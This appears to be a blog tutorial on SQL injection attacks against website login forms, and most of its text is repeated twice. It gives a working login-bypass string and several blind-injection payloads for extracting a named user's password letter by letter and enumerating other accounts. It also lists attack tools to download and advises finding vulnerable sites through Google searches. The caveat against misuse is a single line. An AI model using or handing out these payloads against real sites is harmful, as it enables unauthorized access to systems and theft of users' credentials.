SQL injection is
currently the most common form of web site attack in that web forms are very
common, often they are not coded properly and the hacking tools used to find
weaknesses and take advantage of them are commonly available online. This kind
of exploit is easy enough to accomplish that even inexperienced hackers can
accomplish mischief. However, in the hands of the very skilled hacker, a web
code weakness can reveal root level access of web servers and from there attacks
on other networked servers can be accomplished.
Structured Query Language (SQL) is the nearly universal language of databases that allows the storage, manipulation, and retrieval of data. Databases that use SQL include MS SQL Server, MySQL, Oracle, Access and Filemaker Pro and these databases are equally subject to SQL injection attack.
Web based forms must allow some access to your database to allow entry of data and a response, so this kind of attack bypasses firewalls and endpoint defenses. Any web form, even a simple logon form or search box, might provide access to your data by means of SQL injection if coded incorrectly.
Take A Note Before Start:
1. Just reading this article will not enough to be master of it.
2. Trying these on any website is unethical & offensive too in many country.
3. Make your hand & mind dirty with SQL syntax before going deep into powerful aspect of this method.
4. Learn to find Vulnerable Site using google. Trust me "Google Hacking Database" will teach you amazing secret of Google.
5. Trust in yourself,Don't allow failure to Stop you.Good Luck
How to Identify a Site Vulnerable to an SQL Injection Attack:If a web page accepts text entry (for example a user name and password) then try entering a string that contains one single quote
A vulnerable site may behave oddly & give lengthy error message.
When the testers move to a more advanced SQL injection exploitation they need to know the backend.
The first way to find out which is the backend is by observing the error returned by the application. Follow are some examples:
MySql:
Enter the string 'OR''=' as both user name and password in the login page. This should get you logged in as a user (it happens to be the first user in the table).It will work if that site is programmed by a novice.
Say you login as "antony". But you will not able to know the password. Don't worry... Read next few line, You can see it also possible.
As you should have gained access as "antony" however you still do not know antony's password. You can now find this out using a little trial and error. Before you continue try taking a guess at antony's password by entering antony as user name and your best guess at his password.
Work out antony's password:
You can now get the system to answer questions about the password table. It will only ever answer yes (and let you in) or no (by refusing entry). Your questions must take the form of a valid SQL query. In each case use a xx for the user name and the text shown as password. You can ask questions such as:
Does antony's password have a w in it?
' OR EXISTS(SELECT * FROM users WHERE name='antony' AND password LIKE '%w%') AND ''='
Does antony's password start with w?
' OR EXISTS(SELECT * FROM users WHERE name='antony' AND password LIKE 'w%') AND ''='
Does antony's password have an w followed by d?
' OR EXISTS(SELECT * FROM users WHERE name='antony' AND password LIKE '%w%d%') AND ''='
Is the fourth letter of antony's password w?
' OR EXISTS(SELECT * FROM users WHERE name='antony' AND password LIKE '___w%') AND ''='
This works because the LIKE command uses % and _ as wildcards. The % wildcard matches any string, the _ wildcard matches a single character.
Find a user names using SQL Injection:
You can find other users on the system. We choose to get antony's password simply because he was the first in the list but there may be others.
You can still only ask yes/no questions, but you can find out just about anything you want to with a little patience.
Again you use xx for the user name and enter the following as password:
Are there more than 10 rows in the password table?
' OR (SELECT COUNT(*) FROM users)>10 AND ''='
Is there a user with an r in his name?
' OR EXISTS(SELECT * FROM users WHERE name LIKE '%r%') AND ''='
Is there a user (other than jake) with an a in his name?
' OR EXISTS(SELECT * FROM users WHERE name!='jake' AND name LIKE '%a%') AND ''='
Tools(Click to Download & Try):
1. Havij SQL Injection
2. Pangolin (Link contain supported download also)
3. The Mole
4. SQLNinja (Inbuilt in Backtrack 5) (Linux Version)
5. Safe3SI
6. BSQL Hacker (good one, More compitablity) Link:
7. Sqlmap (My Fav, Little hazy but work fine when used properly)
Structured Query Language (SQL) is the nearly universal language of databases that allows the storage, manipulation, and retrieval of data. Databases that use SQL include MS SQL Server, MySQL, Oracle, Access and Filemaker Pro and these databases are equally subject to SQL injection attack.
Web based forms must allow some access to your database to allow entry of data and a response, so this kind of attack bypasses firewalls and endpoint defenses. Any web form, even a simple logon form or search box, might provide access to your data by means of SQL injection if coded incorrectly.
Take A Note Before Start:
1. Just reading this article will not enough to be master of it.
2. Trying these on any website is unethical & offensive too in many country.
3. Make your hand & mind dirty with SQL syntax before going deep into powerful aspect of this method.
4. Learn to find Vulnerable Site using google. Trust me "Google Hacking Database" will teach you amazing secret of Google.
5. Trust in yourself,Don't allow failure to Stop you.Good Luck
How to Identify a Site Vulnerable to an SQL Injection Attack:If a web page accepts text entry (for example a user name and password) then try entering a string that contains one single quote
A vulnerable site may behave oddly & give lengthy error message.
Fingerprinting the Database
Even the SQL language is a standard, every DBMS has its peculiarity and differs from each other in many aspects like special commands, functions to retrieve data such as users names and databases, features, comments line etc.When the testers move to a more advanced SQL injection exploitation they need to know the backend.
The first way to find out which is the backend is by observing the error returned by the application. Follow are some examples:
MySql:
You have an error in your SQL syntax; check the manual
that corresponds to your MySQL server version for the
right syntax to use near '\'' at line 1
Oracle: ORA-00933: SQL command not properly ended
MS SQL Server: Microsoft SQL Native Client error ‘80040e14’
Unclosed quotation mark after the character string
PostgreSQL: Query failed: ERROR: syntax error at or near
"’" at character 56 in /www/site/test.php on line 121.
To gain access and find a user name: Enter the string 'OR''=' as both user name and password in the login page. This should get you logged in as a user (it happens to be the first user in the table).It will work if that site is programmed by a novice.
Say you login as "antony". But you will not able to know the password. Don't worry... Read next few line, You can see it also possible.
As you should have gained access as "antony" however you still do not know antony's password. You can now find this out using a little trial and error. Before you continue try taking a guess at antony's password by entering antony as user name and your best guess at his password.
Work out antony's password:
You can now get the system to answer questions about the password table. It will only ever answer yes (and let you in) or no (by refusing entry). Your questions must take the form of a valid SQL query. In each case use a xx for the user name and the text shown as password. You can ask questions such as:
Does antony's password have a w in it?
' OR EXISTS(SELECT * FROM users WHERE name='antony' AND password LIKE '%w%') AND ''='
Does antony's password start with w?
' OR EXISTS(SELECT * FROM users WHERE name='antony' AND password LIKE 'w%') AND ''='
Does antony's password have an w followed by d?
' OR EXISTS(SELECT * FROM users WHERE name='antony' AND password LIKE '%w%d%') AND ''='
Is the fourth letter of antony's password w?
' OR EXISTS(SELECT * FROM users WHERE name='antony' AND password LIKE '___w%') AND ''='
This works because the LIKE command uses % and _ as wildcards. The % wildcard matches any string, the _ wildcard matches a single character.
Find a user names using SQL Injection:
You can find other users on the system. We choose to get antony's password simply because he was the first in the list but there may be others.
You can still only ask yes/no questions, but you can find out just about anything you want to with a little patience.
Again you use xx for the user name and enter the following as password:
Are there more than 10 rows in the password table?
' OR (SELECT COUNT(*) FROM users)>10 AND ''='
Is there a user with an r in his name?
' OR EXISTS(SELECT * FROM users WHERE name LIKE '%r%') AND ''='
Is there a user (other than jake) with an a in his name?
' OR EXISTS(SELECT * FROM users WHERE name!='jake' AND name LIKE '%a%') AND ''='
Tools(Click to Download & Try):
1. Havij SQL Injection
2. Pangolin (Link contain supported download also)
3. The Mole
4. SQLNinja (Inbuilt in Backtrack 5) (Linux Version)
5. Safe3SI
6. BSQL Hacker (good one, More compitablity) Link:
7. Sqlmap (My Fav, Little hazy but work fine when used properly)
No comments:
Post a Comment